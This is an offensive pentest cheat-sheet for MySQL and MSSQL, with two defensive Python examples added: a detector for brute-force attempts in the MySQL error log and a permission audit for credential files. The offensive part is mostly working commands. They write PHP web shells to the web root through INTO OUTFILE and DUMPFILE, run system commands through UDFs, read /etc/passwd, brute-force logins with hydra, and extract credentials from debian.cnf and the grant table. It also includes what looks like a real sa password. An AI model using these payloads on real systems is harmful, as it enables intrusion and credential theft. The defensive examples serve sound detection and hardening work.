If we have a MySQL shell via sqlmap or phpMyAdmin, we can use the MySQL `INTO OUTFILE` / `INTO DUMPFILE` clauses to write a web shell to disk. This needs the `FILE` privilege, a destination directory writable by the mysqld user, and a `secure_file_priv` setting that does not restrict the path.

Hex-encode the payload so quoting is not an issue:

```shell
echo -n "<?php phpinfo(); ?>" | xxd -ps
# 3c3f70687020706870696e666f28293b203f3e
```

```sql
select 0x3c3f70687020706870696e666f28293b203f3e into outfile "/var/www/html/blogblog/wp-content/uploads/phpinfo.php";
```

```sql
SELECT "<?php passthru($_GET['cmd']); ?>" into dumpfile '/var/www/html/shell.php';
```

If the `lib_mysqludf_sys` UDF is loaded, `sys_exec` runs commands as the database user:

```sql
select sys_exec('/bin/bash');
```

Then `bash -p` or `sudo su`.
Install the `sqsh` program (an MSSQL client built on FreeTDS):

```shell
apt-get install sqsh freetds-bin freetds-common freetds-dev
```

Usage: add to the bottom of `freetds.conf`:

```
[hostname]
host = 192.168.168.169
port = 2600
tds version = 8.0
```

Edit `~/.sqshrc`:

```
\set username=sa
\set password=password
\set style=vert
```

Connect with `sqsh -S hostname`, or pass the credentials directly:

```shell
sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G
```
If you have an SQL shell from sqlmap or phpMyAdmin, you can read files with the `load_file` function (again subject to the `FILE` privilege and `secure_file_priv`):

```sql
select load_file('/etc/passwd');
```
Nmap NSE scripts for MySQL:

```
mysql-audit.nse
mysql-brute.nse
mysql-databases.nse
mysql-dump-hashes.nse
mysql-empty-password.nse
mysql-enum.nse
mysql-info.nse
mysql-query.nse
mysql-users.nse
mysql-variables.nse
mysql-vuln-cve2012-2122.nse
```
Password brute force with hydra:

```shell
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mysql -vV -I -u
```
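From the defender's side, a hydra run like the one above leaves a burst of `Access denied for user` lines in the MySQL error log. The following is an added example (not part of the original page) that flags source hosts exceeding a failed-login threshold inside a sliding time window. The log lines are constructed in the MySQL 5.7 error-log layout produced with `log_warnings=2` (timestamp, thread id, `[level]`, message); adjust `ACCESS_DENIED_RE` for other server versions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, Set

# Constructed sample (assumed MySQL 5.7 error-log layout): six guesses from one host
# in about one second, then one ordinary failure from a different host.
SAMPLE_ERROR_LOG = """\
2024-05-01T10:00:00.100000Z 40 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2024-05-01T10:00:00.300000Z 41 [Note] Access denied for user 'admin'@'10.0.0.5' (using password: YES)
2024-05-01T10:00:00.500000Z 42 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2024-05-01T10:00:00.700000Z 43 [Note] Access denied for user 'mysql'@'10.0.0.5' (using password: YES)
2024-05-01T10:00:00.900000Z 44 [Note] Access denied for user 'sa'@'10.0.0.5' (using password: YES)
2024-05-01T10:00:01.100000Z 45 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2024-05-01T10:00:05.000000Z 50 [Note] Access denied for user 'alice'@'192.168.1.20' (using password: YES)
2024-05-01T10:00:06.000000Z 51 [Note] Got an error reading communication packets
"""

ACCESS_DENIED_RE = re.compile(
    r"^(?P<ts>\S+)\s+\d+\s+\[\w+\]\s+Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']+)'"
)


def parse_ts(ts: str) -> datetime:
    """MySQL writes UTC timestamps such as 2024-05-01T10:00:00.100000Z."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%fZ")


def detect_bruteforce(text: str, threshold: int = 5, window_s: int = 60) -> Dict[str, Dict[str, object]]:
    """Flag hosts with at least `threshold` failed logins inside any `window_s`-second window.

    Returns {host: {"failures": peak count seen in one window, "users": sorted names tried}}.
    """
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    users: Dict[str, Set[str]] = defaultdict(set)
    flagged: Dict[str, Dict[str, object]] = {}
    for line in text.splitlines():
        m = ACCESS_DENIED_RE.match(line)
        if not m:
            continue
        host, ts = m.group("host"), parse_ts(m.group("ts"))
        users[host].add(m.group("user"))
        q = recent[host]
        q.append(ts)
        # Slide the window: drop failures older than window_s relative to the newest one.
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            previous = int(flagged.get(host, {}).get("failures", 0))
            flagged[host] = {"failures": max(len(q), previous), "users": sorted(users[host])}
    return flagged


if __name__ == "__main__":
    for host, info in detect_bruteforce(SAMPLE_ERROR_LOG).items():
        print(f"{host}: {info['failures']} failures, users tried: {', '.join(info['users'])}")
```

The list of user names tried per host is kept because a spray across `root`, `admin`, `sa` and `mysql` from one address is a stronger signal than repeated failures for a single account, which may just be a misconfigured application.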
Local credential sources once you have a shell on the box:

```shell
# Password of the debian-sys-maint account (should be readable only by root)
cat /etc/mysql/debian.cnf
# Pull user names and password hashes straight out of the raw MyISAM grant table
grep -oaE "[-_.*a-zA-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
```
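Both files above only leak if their permissions are looser than they should be. As an added example (not code from the original page), the function below audits a list of credential files against the widest acceptable mode and reports any excess bits; `demo()` runs it against a constructed throwaway `debian.cnf` in a temp directory rather than the real one. The default paths are Debian-family MySQL locations and are an assumption for other distributions.

```python
import os
import stat
import tempfile
from typing import Dict, List, Optional, Tuple

# Credential-bearing files named above, paired with the widest acceptable mode.
# Assumed Debian-family MySQL defaults; adjust for your distribution.
DEFAULT_SENSITIVE: List[Tuple[str, int]] = [
    ("/etc/mysql/debian.cnf", 0o600),          # debian-sys-maint password, root-only
    ("/var/lib/mysql/mysql/user.MYD", 0o660),  # grant table with password hashes, mysql:mysql
]


def audit_file(path: str, max_mode: int) -> Optional[Dict[str, object]]:
    """Return a finding if `path` carries permission bits beyond `max_mode`; None if fine or absent."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None
    mode = stat.S_IMODE(st.st_mode)
    excess = mode & ~max_mode
    if excess == 0:
        return None
    return {
        "path": path,
        "mode": oct(mode),
        "excess_bits": oct(excess),
        "world_readable": bool(mode & stat.S_IROTH),
    }


def audit_files(entries: List[Tuple[str, int]]) -> List[Dict[str, object]]:
    """Audit every (path, max_mode) pair and return only the files that are too open."""
    return [f for f in (audit_file(p, m) for p, m in entries) if f is not None]


def demo() -> Tuple[List[Dict[str, object]], List[Dict[str, object]]]:
    """Constructed demonstration: a throwaway debian.cnf left at 0644, then tightened to 0600."""
    workdir = tempfile.mkdtemp()
    cnf = os.path.join(workdir, "debian.cnf")
    with open(cnf, "w") as fh:
        fh.write("[client]\nuser = debian-sys-maint\npassword = EXAMPLE_PLACEHOLDER\n")
    os.chmod(cnf, 0o644)
    loose = audit_files([(cnf, 0o600)])  # one finding: any local user can read the password
    os.chmod(cnf, 0o600)
    tight = audit_files([(cnf, 0o600)])  # no findings
    return loose, tight


if __name__ == "__main__":
    for finding in audit_files(DEFAULT_SENSITIVE):
        print(finding)
    print(demo())
```

Run it as root on the database host to check the real files; the `world_readable` flag is the one that turns the `cat /etc/mysql/debian.cnf` step above into a credential leak for every local account.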
Connecting with the `mysql` client:

```shell
# Local
mysql -u <USER>
mysql -u <USER> -p
# Remote
mysql -h <IP> -u <USER>
```
Enumeration once connected:

```sql
show databases;
use <DATABASE>;
show tables;
describe <TABLE>;
select * from <TABLE>;
-- Try to execute code (do_system comes from a user-defined function, not stock MySQL)
select do_system('id');
\! sh
-- Read & Write (both need the FILE privilege and a path allowed by secure_file_priv)
select load_file('<FILE>');
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE '<OUT_FILE>';
```
Cheatsheet:

- https://www.asafety.fr/mysql-injection-cheat-sheet/